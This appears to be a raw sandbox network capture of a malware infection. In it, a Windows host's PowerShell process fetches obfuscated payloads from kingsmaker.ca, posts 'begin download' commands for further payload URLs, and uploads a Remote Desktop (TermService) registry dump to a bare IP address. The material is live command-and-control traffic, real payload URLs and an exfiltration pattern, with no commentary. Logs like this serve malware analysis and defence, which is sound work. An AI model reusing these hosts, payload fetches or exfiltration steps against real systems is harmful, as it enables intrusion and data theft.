                                                                                                            Nov 29, 2024 09:10:46.793979883 CET2578OUTPOST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1
                                                                                                            Host: 23.88.71.29:8000
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=---------------------8dd10236a5b037d
                                                                                                            Content-Length: 5689
                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 33 36 61 35 62 30 33 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED]
                                                                                                            Data Ascii: -----------------------8dd10236a5b037dContent-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
                                                                                                            Nov 29, 2024 09:10:47.331705093 CET839INHTTP/1.1 200 OK
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyhqIJb0eGc0%2Fx1AHHryDTaz53oHSTCuONij58BfaGkPX6pnrpwlm8EqS%2FZNStgZNQI11GRQmSFbsiNT0e7arRCODbA%2B9KiGZiw%2FyAbkJE6BeFY1Z4Xdix31YliEHmogaR0aryXpLFJ2"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            CF-RAY: 8ea11f8b7e4d9018-FRA
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=5314&min_rtt=5309&rtt_var=2001&sent=9&recv=11&lost=0&retrans=0&sent_bytes=820&recv_bytes=6476&delivery_rate=545896&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Date: Fri, 29 Nov 2024 08:10:46 GMT
                                                                                                            Content-Length: 41
                                                                                                            Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e
                                                                                                            Data Ascii: File regBackup.reg uploaded successfully.


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.11.3049735172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:08:58 UTC392OUTGET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-29 08:08:58 UTC1117INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:08:58 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 2856
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wcF%2BscT%2BZS9JuzvYKcL1Fta7x5oMHCg%2BpCNA0sPglwV%2FuQiugIpEwyv%2F4Ic9gjv%2BrfnGn4%2Fp7lJnswKLrNZitvyqegd4s92hQoUkhGz%2BZiOF7ry281mcrmLkTjKePb5nLzEjjW4z48c"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=36512&min_rtt=1072&rtt_var=28093&sent=54&recv=70&lost=0&retrans=0&sent_bytes=13373&recv_bytes=43995&delivery_rate=2600178&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11ce65a0809f7-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158718&min_rtt=158625&rtt_var=33602&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1006&delivery_rate=24105&cwnd=252&unsent_bytes=0&cid=ead1366f67cec06e&ts=673&x=0"
                                                                                                            2024-11-29 08:08:58 UTC252INData Raw: 25 76 75 66 76 67 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 57 32 6d 52 62 6d 71 58 63 46 53 4b 53 45 43 6f 52 6a 69 60 60 46 4b 48 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 47 6b 63 56 75 6f 54 47 4f 43 60 56 47 48 54 6b 43 6b 52 44 31 33 55 49 6a 34 62 6c 47 59 4f 56 34 6b 4c 6b 47 6e 58 55 4b 56 64 54 79 75 55 6c 69 4c 64 6d 4b 70 56 56 30 53 4c 6a 30 37 5b 46 69 4f 57 46 69 70 56 57 53 6b 4c 31 30 44 60 46 79 51 53 44 30 35 56
                                                                                                            Data Ascii: %vufvg<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#NYGkLkm0RVq{UjOoLDuKP1GoRTORc0qYSlu`VDq7W2mRbmqXcFSKSECoRji``FKHWlyQe{CMRTOC[1mETkGkcVuoTGOC`VGHTkCkRD13UIj4blGYOV4kLkGnXUKVdTyuUliLdmKpVV0SLj07[FiOWFipVWSkL10D`FyQSD05V
                                                                                                            2024-11-29 08:08:58 UTC1369INData Raw: 57 65 47 65 31 38 49 53 6c 6d 4f 57 44 4b 6e 55 57 53 53 65 30 71 54 54 59 65 4f 4c 6d 54 78 56 6c 30 46 60 31 34 54 50 55 47 4e 57 46 72 78 56 6d 53 57 64 54 30 75 52 6c 75 4e 53 47 6a 76 56 57 53 57 4f 57 6d 70 54 6c 6d 4e 60 6d 6d 37 56 6a 53 60 60 6a 34 70 54 55 57 4e 63 54 71 73 56 6d 53 5b 4c 54 30 44 58 32 69 4f 53 47 4b 75 56 56 71 4e 60 44 38 49 56 55 53 5b 60 6a 31 30 55 6f 71 47 4c 54 30 55 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 53 48 52 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 6d 68 4c 6d 48 30 52 54 50 76 5b 31 71 49 64 49 5b 60 4c 45 47 72 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 52 49 65 6f 54 55 48 34 65 56 53 75 57 6f 6d 6a 53 6d 4b 33
                                                                                                            Data Ascii: WeGe18ISlmOWDKnUWSSe0qTTYeOLmTxVl0F`14TPUGNWFrxVmSWdT0uRluNSGjvVWSWOWmpTlmN`mm7VjS``j4pTUWNcTqsVmS[LT0DX2iOSGKuVVqN`D8IVUS[`j10UoqGLT0URUeDTV8oRTOC[3SHRkWDTV8oRTOC[1mEPVeKRIONP3mC[1mEPVeKP1GoRTOC[1mETlmhLmH0RTPv[1qIdI[`LEGrX{ON`GnxWoqKRIeoTUH4eVSuWomjSmK3
                                                                                                            2024-11-29 08:08:58 UTC1235INData Raw: 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 6f 53 76 58 6c 30 6a 64 6c 4b 59 53 6f 4b 60 56 44 6d 30 56 55 4b 47 65 6d 71 75 63 49 4f 60 57 44 6d 33 55 6b 4b 53 4f 54 30 75 54 55 43 60 53 46 4f 34 55 6f 71 4b 4c 6a 34 54 53 59 69 5b 57 46 53 71 55 30 65 57 65 31 30 70 57 6c 75 51 53 44 47 32 55 6f 71 5b 4f 57 6d 70 53 55 4f 5b 57 47 54 31 55 54 53 72 60 6d 71 44 54 6c 75 4f 57 44 5b 72 56 6a 53 56 60 6a 34 70 5b 46 75 4e 64 6c 79 73 55 6a 53 47 4c 30 6d 70 52 6c 79 51 53 30 4b 71 55 6d 65 46 60 44 35 78 55 6c 69 4e 64 6a 6a 30 56 6d 53 4f 4f 57 71
                                                                                                            Data Ascii: f\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LLoSvXl0jdlKYSoK`VDm0VUKGemqucIO`WDm3UkKSOT0uTUC`SFO4UoqKLj4TSYi[WFSqU0eWe10pWluQSDG2Uoq[OWmpSUO[WGT1UTSr`mqDTluOWD[rVjSV`j4p[FuNdlysUjSGL0mpRlyQS0KqUmeF`D5xUliNdjj0VmSOOWq


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.11.3049736172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:08:59 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 302
                                                                                                            2024-11-29 08:08:59 UTC302OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 37 64 39 32 64 34 64 37 32 37 32 36 35 31 31 61 37 62 39 65 30 32 35 64 38 30 30 37 36 39 62 31 37 61 35 38 30 39 63 64 34 64 31 31 65 64 35 63 36 37 64 37 39 64 34 31 37 62 32 65 38 64 62 35 61 61 37 63 61 37 32 39 65 33 39 66 61 63 38 37 66 32 38 66 35 37 64 37 33 35 37 62 66 33 36 65 35 62 34 39 66 32 62 30 63 65 62 63 33 62 64 39 34 64 62 61 33 36 38 66 33 30 61 34 35 61 66 65 30 65 39 39 39 30 30 65 39 30 37 32 38 35 63 66 34 37 64 61 65 63 32 61 34 35 35 61 61 37 34 62 31 30 66 38 30 37 30 61 63 36 34 31 31 61 31 65 64 30 64 39 39 34 30 66 66 64 37 64 36 61 32 62 32 34 66 66 36 64 34 30 30 64
                                                                                                            Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400d
                                                                                                            2024-11-29 08:09:00 UTC991INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:00 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xGUIOay27E2gBdcacECotUsGNlC7NdVLo%2F%2FavU5AVdScBAHC%2Bd4h5w2N3ejJW4yJk7GkVqvjqn2grBWoM5D4qgEEdUuHxFL5VaJnZG7CGftQxMlpufCYrf1y4DruCPSKpbF1DbrCdec"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=23479&min_rtt=1209&rtt_var=28326&sent=79&recv=84&lost=0&retrans=0&sent_bytes=36096&recv_bytes=42173&delivery_rate=8133704&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11ced5ccb09fd-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158696&min_rtt=158655&rtt_var=33507&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1246&delivery_rate=24128&cwnd=252&unsent_bytes=0&cid=0e3f4a3c658077f1&ts=712&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.11.3049737172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:00 UTC364OUTGET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            2024-11-29 08:09:01 UTC1109INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:01 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 2854
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqNE7wPWzga%2BJnjbfBM3oQAzu4sNpzSuWawhxrsuNCkCjprMtNliR2VnX%2BtAo7f6rjuV7cjRIB1IraX9FYDl7gjHoHtDj2Pkk%2B53nqZcI7QXWaJg97i9ngZPva2gMCI%2F7ndcGkjqIFm6"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=34368&min_rtt=1072&rtt_var=25772&sent=61&recv=75&lost=0&retrans=0&sent_bytes=17881&recv_bytes=46079&delivery_rate=3563873&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11cf49c3509f1-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158635&min_rtt=158550&rtt_var=33578&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1002&delivery_rate=24118&cwnd=252&unsent_bytes=0&cid=095bf2bef8cae97a&ts=666&x=0"
                                                                                                            2024-11-29 08:09:01 UTC260INData Raw: 25 76 71 71 72 76 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 57 55 4b 60 63 54 5b 73 55 6d 53 43 4c 54 34 54 60 7b 4b 60 57 47 57 34 55 56 30 4a 60 31 34 44 56 55 43 5b 57 47 54 30 56 56 71 52 60 54 34 70 56 6c 30 60 60 6d 6a 31 56 55 4b 4b 4c 57 6d 75 55 55 4f 5b 57 46 53 6e 56 6a 65 4f 4c 6d 6d 37 52 6c 75 60 53 30 54 7b 55 30 65 47 4c 57 71 54 53 59 69 4f 64 6a 6d 37 56 6a 4f 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 5b 44 69 4a 4f 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52
                                                                                                            Data Ascii: %vqqrv<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#WUK`cT[sUmSCLT4T`{K`WGW4UV0J`14DVUC[WGT0VVqR`T4pVl0``mj1VUKKLWmuUUO[WFSnVjeOLmm7Rlu`S0T{U0eGLWqTSYiOdjm7VjOKO1SSc3eKP1Go[DiJOTSSc3eKP1GoRTOC[1mHb14E`TGoRTOC[1mEPVeKP1GoRTOR
                                                                                                            2024-11-29 08:09:01 UTC1369INData Raw: 6b 57 4b 53 45 43 6f 52 6a 65 35 65 6d 6e 76 4c 56 79 6b 4c 31 34 6e 56 6b 4b 56 64 6a 6d 48 65 33 65 53 4c 6b 6d 30 5b 46 30 56 64 56 53 46 54 6f 5b 4c 57 59 43 37 58 6b 48 31 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 4a 58 6c 34 60 65 6c 44 78 57 59 53 56 4c 6d 5b 71 57 56 30 56 64 46 53 59 57 6f 71 6a 50 31 47 31 57 6d 69 4a 62 44 6d 45 54 6b 47 6b 63 56 75 6f 55 47 54 79 63 46 53 49 60 49 5b 60 50 31 4b 53 58 6b 4f 4e 4c 44 6d 45 4c 54 6d 60 57 31 5b 73 56 6d 69 4a 64 6a 6d 45 54 6c 38 60 57 31 5b 73 56 6d 69 4a 64 6a 6d 45 4c 54 4f 68 4c 6d 48 30 52 54 4f 52 60 56 48 78 54 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 56 55 4b 46 4c 47 6a 78
                                                                                                            Data Ascii: kWKSECoRje5emnvLVykL14nVkKVdjmHe3eSLkm0[F0VdVSFTo[LWYC7XkH1O1SSc3eKP1GoRTOC[1mEPVeKP1KJXl4`elDxWYSVLm[qWV0VdFSYWoqjP1G1WmiJbDmETkGkcVuoUGTycFSI`I[`P1KSXkONLDmELTm`W1[sVmiJdjmETl8`W1[sVmiJdjmELTOhLmH0RTOR`VHxTkWDTV8oRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoVUKFLGjx
                                                                                                            2024-11-29 08:09:01 UTC1225INData Raw: 54 53 6c 6d 4f 64 6c 53 71 56 56 30 47 4c 57 71 54 54 6c 30 4f 53 44 54 76 55 6d 53 6e 63 44 30 54 53 59 65 4f 4c 6d 54 7b 55 6b 4b 57 65 31 38 59 53 55 43 4e 57 31 31 31 56 59 71 73 64 6a 34 44 50 59 69 5b 4c 6d 6d 34 56 56 30 5b 4c 44 34 54 52 6c 71 4e 63 57 6a 7b 55 54 65 4a 60 6d 6d 54 53 55 47 4e 57 31 6a 31 56 6d 65 5b 64 6a 38 59 55 59 65 4f 60 6a 47 34 56 6d 53 6b 64 57 6a 78 57 55 47 5b 64 6d 5b 75 55 6a 53 43 4f 44 30 37 56 55 4f 4f 4c 6a 57 32 56 56 71 57 64 6a 38 44 56 6c 30 60 63 57 47 35 55 59 71 72 60 6a 35 78 54 55 43 4f 63 57 6d 34 56 6d 65 47 64 54 30 44 50 55 47 5b 63 57 54 31 55 6d 53 47 4c 6d 71 70 57 6c 69 60 53 46 65 34 55 30 65 5b 4f 54 34 49 53 6c 6d 60 57 31 5b 71 55 31 65 5b 4c 30 71 75 57 59 71 4f 63 54 71 6e 55 54 53 4a 60 54
                                                                                                            Data Ascii: TSlmOdlSqVV0GLWqTTl0OSDTvUmSncD0TSYeOLmT{UkKWe18YSUCNW111VYqsdj4DPYi[Lmm4VV0[LD4TRlqNcWj{UTeJ`mmTSUGNW1j1Vme[dj8YUYeO`jG4VmSkdWjxWUG[dm[uUjSCOD07VUOOLjW2VVqWdj8DVl0`cWG5UYqr`j5xTUCOcWm4VmeGdT0DPUG[cWT1UmSGLmqpWli`SFe4U0e[OT4ISlm`W1[qU1e[L0quWYqOcTqnUTSJ`T


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.11.3049738172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:01 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 302
                                                                                                            2024-11-29 08:09:01 UTC302OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 30 35 35 38 31 38 65 65 32 33 31 33 32 38 38 64 63 36 63 34 32 64 33 66 32 39 38 30 65 36 30 37 61 64 36 33 34 62 65 66 62 34 39 35 37 32 30 65 65 31 62 33 37 62 62 61 35 65 34 66 30 31 34 35 38 65 31 31 30 33 65 37 37 65 30 39 61 34 35 63 38 63 39 33 34 30 31 63 66 32 62 66 34 35 32 63 36 66 37 30 62 63 61 31 35 35 62 38 65 66 33 39 63 30 32 30 32 65 37 32 63 65 35 63 35 66 34 30 38 33 36 37 33 61 30 62 35 33 38 36 66 66 64 31 33 39 63 37 64 34 32 66 32 65 61 32 30 30 35 62 65 38 35 31 36 66 35 61 64 38 32 39 66 39 34 61 62 65 61 62 38 66 37 66 65 33 32 62 61 30 32 62 38 38 65 34 34 64 66 35 62 30
                                                                                                            Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b0
                                                                                                            2024-11-29 08:09:02 UTC981INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:02 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SO63Uu8ZRzFRjMzye%2BXQvoQl1DxijeGG7J9QFrHi9SztAZ8vIYERDAUycHOhBxLGDSVpNn%2BSgVlEJ%2Bb0ZGw%2F3PDZNoDBllD0wBj1EuSuWxtKnFgbyCbDXBRRRq5fdIKDRLEM%2BC%2Fn7wbE"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1293&min_rtt=1293&rtt_var=646&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1088&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11cfb08310adb-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158627&min_rtt=158461&rtt_var=33681&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1246&delivery_rate=24093&cwnd=252&unsent_bytes=0&cid=5ad2999ade7e2570&ts=748&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.11.3049739172.67.179.674433620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:02 UTC364OUTGET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            2024-11-29 08:09:03 UTC1110INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:03 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 21700
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PS%2BJFux4Fx87ROusB5NI2ddPzeFhfKte5MbRD8QXb6WnM0BLlzV4hG1y0Wop25c2Eg%2FGrSgZhkEkaquoGaX8Ml7heSt%2BrJoiGGxpc9HzN6PuS4dCNnSZGSWL1MDv6udyE6V%2FSQ0bIzA1"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=25277&min_rtt=1072&rtt_var=28046&sent=72&recv=84&lost=0&retrans=0&sent_bytes=26116&recv_bytes=49159&delivery_rate=3762886&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d01d8f10ad3-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=159032&min_rtt=158976&rtt_var=33622&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=24068&cwnd=252&unsent_bytes=0&cid=018a00adaa57af67&ts=692&x=0"
